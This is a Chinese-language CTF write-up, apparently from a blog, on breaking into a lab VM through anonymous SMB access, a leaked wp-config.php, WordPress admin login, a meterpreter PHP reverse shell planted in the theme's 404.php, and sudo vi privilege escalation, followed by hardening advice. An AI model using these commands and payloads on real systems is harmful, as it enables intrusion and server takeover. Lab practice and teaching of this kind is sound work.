
从SMB信息泄露到WordPress渗透一个完整的CTF靶机攻防演练记录在网络安全领域CTFCapture The Flag比赛是检验实战能力的重要方式。本文将详细记录一次完整的靶机渗透过程从SMB信息泄露入手逐步深入WordPress系统最终获取系统权限。整个过程不仅展示了常见漏洞的利用方法更体现了渗透测试中信息收集、漏洞分析和权限提升的完整思路。1. 环境准备与信息收集任何渗透测试的第一步都是充分了解目标系统。我们使用Kali Linux作为攻击机靶机运行在VirtualBox环境中网络配置为桥接模式。1.1 网络探测首先需要确定靶机的IP地址。在Kali终端中执行netdiscover -r 192.168.43.0/24发现靶机IP为192.168.43.232。接下来使用nmap进行详细扫描nmap -A -v -T4 192.168.43.232扫描结果显示开放了以下关键端口端口服务可能用途22SSH远程管理80HTTPWeb服务139NetBIOSSMB文件共享445SMB文件共享3306MySQL数据库提示全面扫描时建议同时使用-sV参数获取服务版本信息这对后续漏洞利用至关重要。2. SMB服务信息泄露利用SMBServer Message Block协议是Windows网络中常用的文件共享协议但配置不当常导致信息泄露。2.1 SMB匿名访问检查使用smbclient检查是否允许匿名访问smbclient -L //192.168.43.232当提示输入密码时直接回车成功列出共享资源IPC$sharewordpress2.2 敏感文件获取进一步检查share共享smbclient //192.168.43.232/share发现两个关键文件deets.txt - 包含简单密码12345wordpress目录 - 可能包含网站配置文件下载并检查wp-config.php文件get wp-config.php该文件泄露了WordPress数据库凭据用户名wp_user密码w0rdpr3ss123注意实际环境中这种配置文件泄露可能直接导致整个网站沦陷。3. WordPress渗透实战获得数据库凭据后我们转向Web渗透。3.1 后台登录尝试访问http://192.168.43.232/wordpress/wp-admin尝试使用以下组合admin/12345wp_user/w0rdpr3ss123第二种组合成功登录后台获得了管理员权限。3.2 WebShell上传与利用在WordPress中有几种常见方式上传WebShell通过主题编辑器修改404.php通过媒体库上传恶意文件通过插件上传功能我们选择修改主题文件的方式msfvenom -p php/meterpreter/reverse_tcp LHOST192.168.43.96 LPORT4444 -f raw shell.php将生成的PHP代码插入到当前主题的404.php文件中。同时在Kali上启动监听msfconsole use exploit/multi/handler set payload php/meterpreter/reverse_tcp set LHOST 192.168.43.96 set LPORT 4444 run访问http://192.168.43.232/wordpress/wp-content/themes/twentyfifteen/404.php成功获取反向shell。4. 权限提升与最终突破获得初始shell后通常权限较低需要进一步提权。4.1 系统信息收集在获得的shell中执行whoami uname -a cat /etc/passwd发现系统运行在Linux上当前用户为www-data存在多个普通用户账户。4.2 密码重用尝试使用之前获得的密码尝试切换用户su - user1 密码12345成功提升为user1权限。检查sudo权限sudo -l发现user1可以无密码执行/usr/bin/vi利用此特性获取root权限sudo vi /etc/passwd :!bash最终获得root权限在/root目录下找到flag文件完成整个渗透过程。5. 安全防护建议通过这次演练我们可以总结出几点关键防护措施SMB服务安全禁用匿名访问设置强密码策略限制可访问的IP范围WordPress安全使用独特的管理员用户名定期更新核心和插件限制后台登录尝试次数系统层面防护定期检查文件权限监控异常登录行为实施最小权限原则在实际渗透测试中每个步骤都可能遇到各种障碍需要测试者具备灵活变通的能力。从信息收集到最终突破整个过程体现了攻击链的概念也说明了安全防护需要全面、多层次的防御策略。